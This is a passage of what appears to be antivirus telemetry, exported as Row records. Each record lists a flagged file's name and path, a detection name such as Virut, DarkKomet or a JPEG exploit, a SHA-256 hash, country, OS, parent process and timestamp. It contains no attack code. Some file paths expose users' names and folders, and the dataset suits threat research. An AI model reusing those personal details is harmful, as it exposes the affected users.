  Row(detection=Row(filename='avscan-20181104-203133-07e2585c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203133-07E2585C', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:31:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nscA467.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Total Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-04T09:22:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kmspico v10.1.7.exe', filepath="\\\\?\\D:\\Download en Brand programma's\\Microsoft Office 2016 NL\\Office_2016_NL\\AutoPlay\\Docs\\KMSPico v10.1.7.exe", filesize=4096000, name='SPR/Hacktool.740032.#M1.#R1'), hash='e9d55ee4a70c77183040ee79643d6caef0ff6566c45a21ae2fccd0f85f7e6930', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:57:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='researchdownload.exe', filepath='\\\\?\\E:\\s4r\\New folder (2)\\ResearchDownload.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='e0144b985768fafb24a927fba83a836a45feb967c4b2e53f23831e8793534398', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:23:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wifeysworld.13.02.23.doctors.oral.exam.xxx.720p.mp4-ohrly.(incomplete) (2).rar', filepath='M:\\Neuer Ordner\\wizard\\alt.binaries.mom\\WifeysWorld.13.02.23.Doctors.Oral.Exam.XXX.720p.MP4-OHRLY.(incomplete) (2).rar', filesize=9216000, name='BDS/DarkKomet.cfes.#M1.#R1'), hash='fdb67984a3b8f6ed2422ac4b043ad30c4646902d752cb673f0400cbd6b90fd05', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='M:\\Tangysoft\\Tangysoft.exe', parentsize=4375552, timestamp='2018-11-01T17:57:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252551', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252551', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:44:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='C:\\Downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:30:13Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163531-12828e0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7ee9a9a5\\AVSCAN-20181102-163456-0D63677C\\AVSCAN-20181102-163531-12828E0E', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:35:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='59d42f667f52e4572ae41eba26f810867c3a9b041622fb5bbbc5818e8f6f7fe8', metadata=Row(cmdline='-k secsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T15:10:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111601-8a677e27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357366dc\\AVSCAN-20181102-111537-870389B8\\AVSCAN-20181102-111601-8A677E27', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:32:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090646-b0aa8847', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92e9ac96\\AVSCAN-20181102-090636-AEB26403\\AVSCAN-20181102-090646-B0AA8847', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:03:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-02-10-10-59.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-28T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-02T10:16:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='april.pif', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\2012\\akhir april\\april.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:26:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:49:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202017-6ff832a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c7729a09\\AVSCAN-20181102-201953-6AF65C8D\\AVSCAN-20181102-202017-6FF832A3', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='6c0fbbfc4686f11b02513edf0e6f9c5b61f89c7d106a94766448a6e203b36417', metadata=Row(cmdline=None, country='AM', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:20:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eelgbyrodtiopusw.eel', filepath='\\\\?\\C:\\WINDOWS\\eelgbyrodtiopusw.eel', filesize=2048000, name='Adware/AD.Zdengo.ergtf.#M1.#R1'), hash='2d9f41e3b5a903cf6460d8a09db2c1df940e38949ca693fba65a0ee17d6a7b69', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T19:46:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T13:03:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001069b', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0001069b', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='s0017mdfl.dll', filepath='c:\\program files (x86)\\gsm box cracked full pack by tcs\\autoplay\\docs\\tm miracle falcon box\\bin\\s0017mdfl.dll', filesize=4992000, name='DR/Delphi.Gen.#M300.#R491'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-204323-82a45d0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e98401d\\AVSCAN-20181102-204310-80619A56\\AVSCAN-20181102-204323-82A45D0D', filesize=2288000, name='PUA/InstallCore.#M1.#R1'), hash='52b3f06f79be6ae05541174ce6ca27c2dae93b11b83b1c35125068e920f4f2de', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:43:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00043cc8', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00043cc8', filesize=21504000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='49dcb73d7b90e9a5fdc66a13c22a07e85376d2ce61573362eb0b34e7ac49a875', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:23:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='modules.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\platform\\update\\backup\\netbeans\\config\\Modules\\Modules.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:28:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7146048\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/MONITOR', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T23:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A59236033242F343FABED956D3E4D7B86A6FC5833ACAF0EB6567AD91B812FBA', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0a59236033242f343fabed956d3e4d7b86a6fc5833acaf0eb6567ad91b812fba', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0116533.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0116533.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ioc6839fbbb-1232-5d47-aa25-3f5f14678c30.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc6839FBBB-1232-5D47-AA25-3F5F14678C30.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T20:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115405-a208965a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cb056a1b\\AVSCAN-20181102-115312-9831E5F4\\AVSCAN-20181102-115405-A208965A', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:54:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:03Z'), dt=datetime.date(2018, 11, 2)),
